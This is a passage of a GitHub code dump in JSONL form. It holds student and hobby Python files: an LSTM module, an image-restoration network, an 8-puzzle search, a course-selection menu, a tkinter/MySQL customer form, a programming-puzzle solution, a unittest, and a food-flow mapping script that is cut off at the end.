+{"seq_id":"32912046987","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\n\n################################################################################\n\nclass LSTM(nn.Module):\n\n\tdef __init__(self, seq_length, input_dim, num_hidden, num_classes, batch_size, device='cpu'):\n\t\tsuper(LSTM, self).__init__()\n\t\tself.seq_length = seq_length\n\t\tself.input_dim = input_dim\n\t\tself.num_hidden = num_hidden\n\t\tself.num_classes = num_classes\n\t\tself.batch_size = batch_size\n\t\tself.device = device\n\n\t\tself.w_gx = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_gh = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_g = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_ix = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_ih = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_i = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_fx = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_fh = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_f = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_ox = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_oh = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_o = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_ph = torch.nn.Parameter(torch.Tensor(num_hidden, num_classes).to(device))\n\t\tself.b_p = torch.nn.Parameter(torch.Tensor(num_classes).to(device))\n\n\t\t# Initialization \n\t\tself.w_gx = nn.init.kaiming_normal_(self.w_gx)\n\t\tself.w_gh = nn.init.kaiming_normal_(self.w_gh)\n\t\tself.b_g = nn.init.constant_(self.b_g, 0)\n\t\tself.w_ix = nn.init.kaiming_normal_(self.w_ix)\n\t\tself.w_ih = nn.init.kaiming_normal_(self.w_ih)\n\t\tself.b_i = nn.init.constant_(self.b_i, 0)\n\t\tself.w_fx = nn.init.kaiming_normal_(self.w_fx)\n\t\tself.w_fh = nn.init.kaiming_normal_(self.w_fh)\n\t\tself.b_f = nn.init.constant_(self.b_f, 0)\n\t\tself.w_ox = nn.init.kaiming_normal_(self.w_ox)\n\t\tself.w_oh = nn.init.kaiming_normal_(self.w_oh)\n\t\tself.b_o = nn.init.constant_(self.b_o, 0)\n\t\tself.w_ph = nn.init.kaiming_normal_(self.w_ph)\n\t\tself.b_p = nn.init.constant_(self.b_p, 0)\n\n\t\t# Initialize h(0)\n\t\tself.h_t = torch.zeros((self.batch_size, self.num_hidden)).to(device)\n\t\t# Initialize c(0)\n\t\tself.c_t = torch.zeros((self.batch_size, self.num_hidden)).to(device)\n\n\n\tdef forward(self, x):\n\t\th_prev = self.h_t\n\t\tc_prev = self.c_t\n\t\tfor t in range(self.seq_length):\n\t\t\tg_t = torch.tanh(x[:, t, :] @ self.w_gx + h_prev @ self.w_gh + self.b_g)\n\t\t\ti_t = torch.sigmoid(x[:, t, :] @ self.w_ix + h_prev @ self.w_ih + self.b_i)\n\t\t\tf_t = torch.sigmoid(x[:, t, :] @ self.w_fx + h_prev @ self.w_fh + self.b_f)\n\t\t\to_t = torch.sigmoid(x[:, t, :] @ self.w_ox + h_prev @ self.w_oh + self.b_o)\n\t\t\tc_t = torch.mul(g_t, i_t) + torch.mul(c_prev, f_t)\n\t\t\th_t = torch.mul(torch.tanh(c_t), o_t)\n\t\t\tp_t = h_t @ self.w_ph + self.b_p\n\t\t\th_prev = h_t\n\t\t\tc_prev = c_t\n\t\treturn p_t","repo_name":"martinetoering/Deep-Learning","sub_path":"Part2-RNN-LSTM-Graph/part1/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"27602121492","text":"import math\n# PyTorch lib\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.utils.data as Data\nimport torch.nn.functional as F\n\nimport split_attention as split\n\nfrom model import architecture\n\nimport ASPP\n\n\nclass MSDAN(nn.Module):\n def __init__(self, recurrent_iter=3, use_GPU=True):\n super(MSDAN, self).__init__()\n self.iteration = recurrent_iter\n self.use_GPU = use_GPU\n\n self.conv_i = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Sigmoid()\n )\n self.conv_f = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Sigmoid()\n )\n self.conv_g = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Tanh()\n )\n self.conv_o = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Sigmoid()\n )\n\n self.pyramid = ASPP.ASPP()\n\n self.SplAtConv2d = split.SplAtConv2d(in_channels=32, channels=32, kernel_size=3, stride=1, padding=1,\n dilation=1, groups=1, bias=True, radix=2)\n\n self.architecture = architecture.IMDN(in_nc=32, upscale=1)\n\n def forward(self, input): # input(16, 3, 100, 100)\n batch_size, row, col = input.size(0), input.size(2), input.size(3)\n\n x = input # (16, 3, 100, 100)\n h = Variable(torch.zeros(batch_size, 32, row, col)) # (16, 32, 100, 100)\n c = Variable(torch.zeros(batch_size, 32, row, col)) # (16, 32, 100, 100)\n\n if self.use_GPU:\n h = h.cuda()\n c = c.cuda()\n\n x_list = []\n for i in range(self.iteration):\n x = input\n x = torch.cat((input, x), 1) # (16, 6, 100, 100)\n\n x = self.pyramid(x)\n\n # x = self.conv0(x) # (16, 32, 100, 100)\n\n x = torch.cat((x, h), 1) # (16, 64, 100, 100)\n\n i = self.conv_i(x) # (16, 32, 100, 100)\n f = self.conv_f(x) # (16, 32, 100, 100)\n g = self.conv_g(x) # (16, 32, 100, 100)\n o = self.conv_o(x) # (16, 32, 100, 100)\n c = f * c + i * g # (16, 32, 100, 100)\n x = o * torch.tanh(c) # (16, 32, 100, 100)\n # print(x.shape)\n\n x = self.SplAtConv2d(x)\n\n x = self.architecture(x)\n\n x_list.append(x)\n\n return x, x_list\n\n\nif __name__ == '__main__':\n ts = torch.Tensor(16, 3, 64, 64)\n vr = Variable(ts)\n net = MSDAN()\n\n\n","repo_name":"lydeath/MSDAN","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"73155195751","text":"# 扩展出不同状态\r\ndef expend(state): # state为扩展前的状态\r\n\r\n # 检验当前深度是否已经超出上限,若超出上限,则不进行扩展\r\n if gn[state] > int(depth_limit):\r\n return None\r\n\r\n expended = []\r\n k = state.index(\"0\") # k为0所在的位置\r\n for a in range(0, len(movs[k])):\r\n i = k # i为0的位置\r\n j = movs[i][a] # j为待交换元素的位置\r\n if i > j:\r\n i, j = j, i\r\n new = state[: i] + state[j] + state[i + 1: j] + state[i] + state[j + 1:] # 扩展出的一个新状态\r\n expended.append(new)\r\n return expended\r\n\r\n\r\ndef reverse_number(state):\r\n Sum = 0\r\n for i in range(1, 9):\r\n num = 0\r\n for j in range(0, i):\r\n if state[j] > state[i] != '0':\r\n num = num + 1\r\n Sum += num\r\n return Sum\r\n\r\n\r\ndef is_solvable(S0):\r\n i = reverse_number(S0)\r\n j = reverse_number(goal)\r\n if i % 2 == j % 2:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef print_result(state):\r\n # 根据parent中的索引,找出路径\r\n results = [state] # 用来存放路径\r\n while parent[state] != -1:\r\n state = parent[state]\r\n results.append(state)\r\n results.reverse() # 逆序\r\n print(\"可求解,求解过程如下:\")\r\n i = -1\r\n for result in results:\r\n i = i + 1\r\n print(\"\")\r\n print(\"step----\" + str(i))\r\n print(result[:3])\r\n print(result[3:6])\r\n print(result[6:])\r\n print(\"\")\r\n\r\n\r\ndef search_depth(S0):\r\n global parent\r\n global gn\r\n global limit\r\n\r\n sum = limit\r\n opened = []\r\n closed = []\r\n\r\n # S0加入opened表\r\n opened.append(S0)\r\n\r\n # 开始搜索\r\n while opened:\r\n\r\n # 检验搜索次数是否超出限制\r\n limit = limit - 1\r\n search_times = sum - limit\r\n print(\"正在进行第%d次搜索\" % search_times)\r\n if limit < 1:\r\n return current\r\n\r\n # opened表中删除第一个状态n,将n放入closed表,\r\n current = opened.pop() # 宽度优先:opened表使用先进先出的堆栈结构,使搜索优先偏向先生成的状态\r\n closed.append(current)\r\n print(\"正在搜索第%d层\" % gn[current])\r\n print(\"curret:\" + current)\r\n print(\"goal:\" + goal)\r\n\r\n # 搜索成功,结束循环\r\n if current == goal:\r\n break\r\n\r\n # 扩展当前状态,删除子状态中在opened表或closed表中出现过的状态,避免重复循环搜索\r\n # 其余子状态加入opened表\r\n newStates = expend(current)\r\n if newStates is None:\r\n continue\r\n\r\n for s in newStates:\r\n if s not in opened and s not in closed:\r\n gn[s] = gn[current] + 1\r\n parent[s] = current\r\n opened.append(s)\r\n # 检验是由于opened表为空而停止,还是因为搜索到了解路径而停止。\r\n if not opened:\r\n print(\"有解但是由于深度限制无法求出解!\")\r\n return current\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # 操作算子集合\r\n movs = {0: [1, 3], 1: [0, 2, 4], 2: [1, 5], 3: [0, 4, 6], 4: [3, 1, 5, 7], 5: [4, 2, 8], 6: [3, 7], 7: [6, 4, 8],\r\n 8: [7, 5]}\r\n\r\n gn = {} # gn用于存放各个状态所在深度\r\n parent = {} # 用于存放各个状态的父状态,用于输出解路径\r\n # 输入初始状态和目标状态\r\n state0 = input(\"请输入初始状态(从左到右从上到下):\")\r\n goal = input(\"请输入目标状态(从左到右从上到下):\")\r\n\r\n # 输入搜索次数上限\r\n limit = int(input(\"请输入搜索次数的上限(例如:50000):\"))\r\n\r\n # 输入深度上限\r\n depth_limit = int(input(\"请输入搜索深度的上限(例如:5000):\"))\r\n\r\n parent[state0] = -1 # 初始状态的父状态设置为-1\r\n gn[state0] = 0 # 初始状态的深度设置为0\r\n\r\n # 判断是否有解\r\n if state0 == goal:\r\n print(\"初始状态与目标状态一致,搜索结束。\")\r\n elif not is_solvable(state0) or len(state0) != 9:\r\n print(\"不可达,无解!\")\r\n else:\r\n current = search_depth(state0) # 开始搜索\r\n print_result(current) # 按格式输出结果\r\n if limit == 0:\r\n print(\"有解但搜索超时,建议更换搜索算法或目标序列!!!\")\r\n","repo_name":"xxLL-xh/artificial-intelligence","sub_path":"人工智能导论/5.盲目搜索策略:深度优先搜索解决“八数码”问题/code/search_depth.py","file_name":"search_depth.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8282388251","text":"from interface import teacher_interface,common_interface\nfrom lib import common\nuser_data={'name':None}\ndef login():\n while True:\n name=input('please input your username>>:').strip()\n password=input('plesae input your password>>:').strip()\n flag,msg=common_interface.login(name,password,'teacher')\n if flag:\n user_data['name']=name\n print(msg)\n break\n else:print(msg)\n@common.login_auth('teacher')\ndef check_courses():\n course_list=teacher_interface.check_courses(user_data['name'])\n if course_list:\n for i in course_list:\n print(i)\n else:print('暂无教授的课程')\n@common.login_auth('teacher')\ndef choose_course():\n course_list=common_interface.check_info('course')\n if course_list:\n for i,name in enumerate(course_list):\n print(i+1,name)\n dec= input('please choice>>\"').strip()\n if dec.isdigit():\n dec = int(dec)\n if dec in range(1, len(course_list) + 1):\n course_name = course_list[dec - 1]\n teacher_interface.choose_course(course_name,user_data['name'])\n print('选课成功')\n return\n else:print('not in range')\n else:print('must be int ')\n else:print('暂无任何课程')\n@common.login_auth('teacher')\ndef check_student():\n course_list=teacher_interface.check_courses(user_data['name'])\n if course_list:\n while True:\n for i,name in enumerate(course_list):\n print(i,name)\n dec=input('please choice>>:').strip()\n if dec=='q':return\n if dec.isdigit():\n dec=int(dec)\n if dec in range(0,len(course_list)):\n coures_name=course_list[dec]\n student_list=teacher_interface.check_student(coures_name)\n if student_list:\n for name in student_list:\n print(name)\n return\n else:print('not student')\n else:print('range error')\n else:print('must be int')\n else:print('暂无教授课程所以无法查看学生')\n@common.login_auth('teacher')\ndef modify_score():\n course_list=teacher_interface.check_courses(user_data['name'])\n if course_list:\n while True:\n for i,course in enumerate(course_list):\n print(i+1,course)\n dec=input('你想修改哪门课程下的学生成绩>>:').strip()\n if dec=='q':return\n if dec.isdigit():\n dec = int(dec)\n if dec in range(1, len(course_list) + 1):\n course_name = course_list[dec - 1]\n student_list=teacher_interface.check_student(course_name)\n if student_list:\n for i,name in enumerate(student_list):\n print(i+1,name)\n dec=input('please choose student').strip()\n if dec.isdigit():\n dec = int(dec)\n if dec in range(1, len(student_list) + 1):\n student_name = student_list[dec - 1]\n score=input('你想将学生这门课的成绩改成多少?').strip()\n if score.isdigit():\n score=int(score)\n teacher_interface.modify(student_name,course_name,score,user_data['name'])\n print('修改成功')\n return\n else:print('分数必须是数字')\n else:print('not in normal range')\n else:print('choose must be int')\n else:print('课程下暂无学生')\n else:print('not in normal range')\n else:print('choose must be int')\n else:print('你暂时还没有教授的课程')\n\nfunc_dic={'1':login,'2':check_courses,'3':choose_course,'4':check_student,'5':modify_score}\ndef run():\n while True:\n print('''\n 1、登录\n 2、查看教授课程\n 3、选择教授课程\n 4、查看课程下学生\n 5、修改学生成绩 \n ''')\n choice = input('please choice>>:').strip()\n if choice not in func_dic: continue\n func_dic[choice]()","repo_name":"DominicJi/Select_Course_System","sub_path":"core/teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72262294309","text":"import tkinter as tk\nfrom tkinter import ttk, messagebox\nimport mysql.connector\nfrom tkinter import *\n\n\ndef GetValue(event):\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n row_id = listBox.selection()[0]\n select = listBox.set(row_id)\n e1.insert(0, select['customerid'])\n e2.insert(0, select['customername'])\n e3.insert(0, select['email'])\n e4.insert(0, select['contact'])\n\n\ndef Add():\n customerid = e1.get()\n customername = e2.get()\n email = e3.get()\n contact = e4.get()\n\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n\n try:\n sql = \"INSERT INTO customer (customerid,customername,email,contact) VALUES (%s, %s, %s, %s)\"\n val = (customerid, customername, email, contact)\n mycursor.execute(sql, val)\n mysqldb.commit()\n lastid = mycursor.lastrowid\n messagebox.showinfo(\"information\", \"Customer inserted successfully...\")\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n e1.focus_set()\n except Exception as e:\n print(e)\n mysqldb.rollback()\n mysqldb.close()\n\n\ndef update():\n customerid = e1.get()\n customername = e2.get()\n email = e3.get()\n contact = e4.get()\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n\n try:\n sql = \"Update customer set customername= %s,email= %s,contact= %s where customerid= %s\"\n val = (customername, email, contact, customerid)\n mycursor.execute(sql, val)\n mysqldb.commit()\n lastid = mycursor.lastrowid\n messagebox.showinfo(\n \"information\", \"Record Updateddddd successfully...\")\n\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n e1.focus_set()\n\n except Exception as e:\n\n print(e)\n mysqldb.rollback()\n mysqldb.close()\n\n\ndef delete():\n studid = e1.get()\n\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n\n try:\n sql = \"delete from customer where customerid = %s\"\n val = (id,)\n mycursor.execute(sql, val)\n mysqldb.commit()\n lastid = mycursor.lastrowid\n messagebox.showinfo(\"information\", \"Record Deleteeeee successfully...\")\n\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n e1.focus_set()\n\n except Exception as e:\n\n print(e)\n mysqldb.rollback()\n mysqldb.close()\n\n\ndef show():\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n mycursor.execute(\n \"SELECT customerid,customername,email,contact FROM customer\")\n records = mycursor.fetchall()\n print(records)\n\n for i, (customerid, customername, email, contact) in enumerate(records, start=1):\n listBox.insert(\"\", \"end\", values=(\n customerid, customername, email, contact))\n mysqldb.close()\n\n\nroot = Tk()\nroot.geometry(\"800x500\")\nglobal e1\nglobal e2\nglobal e3\nglobal e4\n\ntk.Label(root, bg=\"yellow\", text=\"Customer Registration\",\n fg=\"red\", font=(None, 30)).place(x=300, y=5)\n\ntk.Label(root, text=\"Customer ID\").place(x=10, y=10)\nLabel(root, text=\"Customer Name\").place(x=10, y=40)\nLabel(root, text=\"Email\").place(x=10, y=70)\nLabel(root, text=\"Contact\").place(x=10, y=100)\n\ne1 = Entry(root)\ne1.place(x=140, y=10)\n\ne2 = Entry(root)\ne2.place(x=140, y=40)\n\ne3 = Entry(root)\ne3.place(x=140, y=70)\n\ne4 = Entry(root)\ne4.place(x=140, y=100)\n\nButton(root, text=\"Add\", command=Add, height=3, width=13).place(x=30, y=130)\nButton(root, text=\"update\", command=update,\n height=3, width=13).place(x=140, y=130)\nButton(root, text=\"Delete\", command=delete,\n height=3, width=13).place(x=250, y=130)\n\ncols = ('Customer id', 'Customer name', 'Email', 'Contact')\nlistBox = ttk.Treeview(root, columns=cols, show='headings')\n\nfor col in cols:\n listBox.heading(col, text=col)\n listBox.grid(row=1, column=0, columnspan=2)\n listBox.place(x=10, y=200)\n\nshow()\nlistBox.bind('', GetValue)\n\nroot.mainloop()\n","repo_name":"arfa-shaikh/form","sub_path":"form1.py","file_name":"form1.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14714248098","text":"# 기본수학1\n# 백준 - 10250번 \n\n# 1st try: \n\nimport sys\n\nT = int(input())\n\nRN_list = []\nfor i in range(T):\n H, W, N = map(int, sys.stdin.readline().split())\n N = N-1\n if H == 1: # H(층 수)가 1개일 경우\n room_number = '1' + (str(N+1) if N>10 else '0'+str(N+1))\n elif W == 1: # W(층별 방 개수)가 1개일 경우\n room_number = str(N+1) + '01'\n else: # 방 번호 = N을 H(층)으로 나눈 나머지 + N을 H(층)으로 나눈 몫\n room_number = str(N%H+1) + (str(0)+str(N//H+1) if N//H+1<10 else str(N//H+1))\n RN_list.append(room_number)\n\nfor room_number in RN_list: \n print(room_number)\n\n# 2nd try: \n'''\nimport sys \n\nH, W = map(int, sys.stdin.readline().split())\n\nfor N in range(1, H*W+1):\n if H == 1: # H(층 수)가 1개일 경우\n room_number = '1' + (str(N) if N>=10 else '0'+str(N))\n elif W == 1: # W(층별 방 개수)가 1개일 경우\n room_number = str(N) + '01'\n else: # 방 번호 = N을 H(층)으로 나눈 나머지 + N을 H(층)으로 나눈 몫\n room_number = str(N%(H+1) if N%(H+1)!=0 else continue) + (str(0)+str(N//H+1) if N//H+1<10 else str(N//H+1))\n print(room_number)\n'''\n\n'''\nimport sys \n\nH, W = map(int, sys.stdin.readline().split())\n\nfor N in range(H*W+1):\n # 앞자리 Y 연산\n Y = str(N%H+1)\n \n # 뒷자리 X 연산\n if N//H+1 < 10:\n X = str(0)+str(N//H+1)\n else:\n X = str(N//H+1)\n\n room_number = f'{N}: ' + Y + ' ' + X\n print(room_number)\n\n'''","repo_name":"asdfrv20/Three_Dorks","sub_path":"12_정렬/10250_ACM호텔.py","file_name":"10250_ACM호텔.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31216601857","text":"from cdr import Cdr\nimport unittest\nfrom datetime import datetime\n\n\nclass TestSerializeCdr(unittest.TestCase):\n\n def get_a_cdr(self, now):\n d = Cdr()\n\n e = Cdr()\n e[11] = 123\n e[12] = \"hi\"\n\n f = Cdr()\n f[21] = 456\n f[22] = \"yo\"\n\n d[1] = 123\n d[2] = \"Hello\"\n d[3] = \"World\"\n d[4] = 1.25\n d[5] = now\n\n d[6] = [e, f]\n\n return d\n\n def test_serialize(self):\n d = self.get_a_cdr(datetime.now())\n\n data = d.serialize()\n\n e = Cdr()\n e.deserialize(data)\n\n self.assertEqual(e.keys(), d.keys())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"blu-corner/cdr","sub_path":"test/python/test_serialize.py","file_name":"test_serialize.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"24585213952","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport geopandas as gpd\nfrom shapely import wkt\nimport numpy as np\nimport seaborn as sns\nimport pyproj\n\n\n### Accessing the data\n\n#The dataset is available on Zenodo (https://zenodo.org/record/6423382#.Y-PdQq2ZO3A). We save the dataset to \"/my_directory/\" and access it using the package pandas, which converts the original .csv file to a pandas dataframe. Note that encoding has to be defined as 'cp1252'.\n\ndata_directory=\"/my_directory/\"\ndf=pd.read_csv(data_directory+\"Food_flow_data_v1.csv\", delimiter=';', encoding='cp1252')\ndf.head()\n\n#To create a subset of data containing inflows on the one hand and outflows on the other, we extract those rows with the source outside and the destination within the urban boundary for inflows, and vice versa for outflows.\n\ndf_incoming=df[(df[\"source_within_urban_boundary\"] == \"no\") & (df[\"destination_within_urban_boundary\"] == \"yes\")]\ndf_outgoing=df[(df[\"source_within_urban_boundary\"] == \"yes\") & (df[\"destination_within_urban_boundary\"] == \"no\")]\n\n### Secondary data\n\n#Below, we take a look at the secondary data for Ouaga, which were added to the dataset. First, we show absolute and relative quantities of incoming products by railway. Second, we look at outgoing flows by plane.\n\n# Ouaga secondary data\n# Rail incoming\ndf_incoming_ouaga_or=df[(df[\"city\"] == \"Ouagadougou\") & (df[\"source_within_urban_boundary\"] == \"no\") & (df[\"destination_within_urban_boundary\"] == \"yes\")]\ndf_incoming_ouaga=df_incoming_ouaga_or.copy()\ndf_incoming_ouaga.loc[df_incoming_ouaga['commodity_name_gen'] == 'Wheat flour', 'commodity_name_gen'] = 'Wheat'\ndf_incoming_ouaga_transport_rail=df_incoming_ouaga[(df_incoming_ouaga['means_of_transport']=='Rail')]\ndf_incoming_ouaga_transport_rail_sum=df_incoming_ouaga_transport_rail.groupby(['commodity_name_gen', 'season'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_ouaga_transport_rail_sum['quantity_rail_kg_per_day']=df_incoming_ouaga_transport_rail_sum['daily_quantity_adjusted_for_missing_locations']\ndf_incoming_ouaga_transport_rail_sum_new=df_incoming_ouaga_transport_rail_sum.drop(columns='daily_quantity_adjusted_for_missing_locations')\ndf_incoming_ouaga_transport_all_sum=df_incoming_ouaga.groupby(['commodity_name_gen', 'season'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_ouaga_merge=pd.merge(df_incoming_ouaga_transport_all_sum, df_incoming_ouaga_transport_rail_sum_new, on=['commodity_name_gen', 'season'], how='right')\ndf_incoming_ouaga_merge['rail_percent_of_total_incoming']=df_incoming_ouaga_merge['quantity_rail_kg_per_day']*100/df_incoming_ouaga_merge['daily_quantity_adjusted_for_missing_locations']\nprint(df_incoming_ouaga_merge)\n\n# Ouaga secondary data\n# air outgoing\n\ndf_outgoing_ouaga_or=df[(df[\"city\"] == \"Ouagadougou\") & (df[\"source_within_urban_boundary\"] == \"yes\") & (df[\"destination_within_urban_boundary\"] == \"no\")]\ndf_outgoing_ouaga=df_outgoing_ouaga_or.copy()\ndf_outgoing_ouaga_transport_air=df_outgoing_ouaga[(df_outgoing_ouaga['means_of_transport']=='Plane')]\ndf_outgoing_ouaga_transport_air_sum=df_outgoing_ouaga_transport_air.groupby(['commodity_name_gen', 'season'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_ouaga_transport_air_sum['quantity_air_kg_per_day']=df_outgoing_ouaga_transport_air_sum['daily_quantity_adjusted_for_missing_locations']\ndf_outgoing_ouaga_transport_air_sum_new=df_outgoing_ouaga_transport_air_sum.drop(columns='daily_quantity_adjusted_for_missing_locations')\ndf_outgoing_ouaga_transport_all_sum=df_outgoing_ouaga.groupby(['commodity_name_gen', 'season'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_ouaga_merge=pd.merge(df_outgoing_ouaga_transport_all_sum, df_outgoing_ouaga_transport_air_sum_new, on=['commodity_name_gen', 'season'], how='right')\ndf_outgoing_ouaga_merge['air_percent_of_total_outgoing']=df_outgoing_ouaga_merge['quantity_air_kg_per_day']*100/df_outgoing_ouaga_merge['daily_quantity_adjusted_for_missing_locations']\nprint(df_outgoing_ouaga_merge)\n\n### Fig. 6: Daily per capita inflows (in kg/cap/day) per food group\n#Fig. 6 shows inflows for all four cities aggregated at the level of commodity category (or food group).\n\ndf_incoming_lean=df_incoming[((df_incoming['season']=='lean') & (df_incoming['city']=='Ouagadougou')) | ((df_incoming['season']=='lean') & (df_incoming['city']=='Bamako')) | ((df_incoming['season']=='lean') & (df_incoming['city']=='Bamenda')) | ((df_incoming['season']=='lean') & (df_incoming['year']==2014) & (df_incoming['city']=='Tamale'))]\ndf_incoming_lean_by_category=df_incoming_lean.groupby(['city', 'commodity_category', 'population'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_lean_by_category['daily_per_capita_quantity']=df_incoming_lean_by_category['daily_quantity_adjusted_for_missing_locations']/df_incoming_lean_by_category['population']\n\npalette = {'Tamale': '#20639B', 'Ouagadougou': '#3CAEA3', 'Bamako': '#F6D55C', 'Bamenda':'#ED553B'}\nax=sns.barplot(data=df_incoming_lean_by_category, x='commodity_category', y='daily_per_capita_quantity', hue='city', palette=palette)\nplt.xticks(fontsize=8)\nplt.yticks(fontsize=8)\nplt.ylabel('Quantity (kg/cap/day)',fontsize=10)\nplt.xlabel('Commodity category',fontsize=10)\nplt.title('Food inflows (lean season)')\nplt.setp(ax.get_legend().get_texts(), fontsize='8') # for legend text\nplt.setp(ax.get_legend().get_title(), fontsize='10') # for legend title\nplt.show()\n\n### Fig. 7: In- and outflows in kg/day of maize in Tamale (peak season).\n#Fig. 7 plots sources and destinations of maize flows for Tamale (lean season 2014), where the symbol size reflects the absolute quantity (not adjusted by % missing locations).\n#Note that we import the package pyproj to get the country delineation as a basemap. We need to change the directory as the package would otherwise access an existing, but older, version of pyproj in PostGIS.\n\npyproj.datadir.set_data_dir(\"C:\\\\Users\\\\hanna\\\\anaconda3\\\\pkgs\\\\proj-9.1.0-heca977f_1\\\\Library\\\\share\\\\proj\")\n\n# Tamale & maize\ndf_tle_maize=df[(df['city']=='Tamale') & (df['commodity_name_gen']=='Maize')]\ndf_incoming_tle_maize=df_tle_maize[(df_tle_maize[\"source_within_urban_boundary\"] == \"no\") & (df_tle_maize[\"destination_within_urban_boundary\"] == \"yes\")]\ndf_incoming_tle_maize_peak=df_incoming_tle_maize[(df_incoming_tle_maize['season']=='peak') & (df_incoming_tle_maize['year']==2014)]\n\n#inflows\ndaily_quantity_source_geo_sum_tle=df_incoming_tle_maize_peak.groupby(['city','commodity_name_gen', 'season', 'year', 'source_geometry'], as_index=False)['daily_quantity'].sum()\n\n#outflows\ndf_outgoing_tle_maize=df_tle_maize[(df_tle_maize[\"source_within_urban_boundary\"] == \"yes\") & (df_tle_maize[\"destination_within_urban_boundary\"] == \"no\")]\ndf_outgoing_tle_maize_peak=df_outgoing_tle_maize[(df_outgoing_tle_maize['season']=='peak') & (df_outgoing_tle_maize['year']==2014)]\ndaily_quantity_destination_geo_sum_tle=df_outgoing_tle_maize_peak.groupby(['city','commodity_name_gen', 'season', 'year', 'destination_geometry'], as_index=False)['daily_quantity'].sum()\n\ngpd.datasets.get_path(\"naturalearth_lowres\")\ncountries = gpd.read_file(gpd.datasets.get_path(\"naturalearth_lowres\"))\n\ndaily_quantity_source_geo_sum_tle_cp=daily_quantity_source_geo_sum_tle.copy()\ndaily_quantity_destination_geo_sum_tle_cp=daily_quantity_destination_geo_sum_tle.copy()\n\ndaily_quantity_source_geo_sum_tle_cp.loc[:, 'geometry'] = daily_quantity_source_geo_sum_tle_cp.source_geometry.apply(wkt.loads)\ndaily_quantity_source_geo_sum_tle_cp.drop('source_geometry', axis=1, inplace=True) #Drop WKT column\n\ndaily_quantity_destination_geo_sum_tle_cp.loc[:, 'geometry'] = daily_quantity_destination_geo_sum_tle_cp.destination_geometry.apply(wkt.loads)\ndaily_quantity_destination_geo_sum_tle_cp.drop('destination_geometry', axis=1, inplace=True) #Drop WKT column\n\n# Geopandas GeoDataFrame\nfig, (ax1, ax2) = plt.subplots(1,2, sharey=True)\ncountries = gpd.read_file(gpd.datasets.get_path(\"naturalearth_lowres\"))\ncountries[(countries[\"name\"] == \"Ghana\")].plot(color=\"lightgrey\", ax=ax1)\ngdf1 = gpd.GeoDataFrame(daily_quantity_source_geo_sum_tle_cp, geometry='geometry')\ngdf1['values'] = gdf1['daily_quantity']/100 # in 100kg\ngdf1.plot(alpha=0.5, k=5, markersize=gdf1['values'], ax=ax1)\nax1.set_title('inflows')\n\ncountries[(countries[\"name\"] == 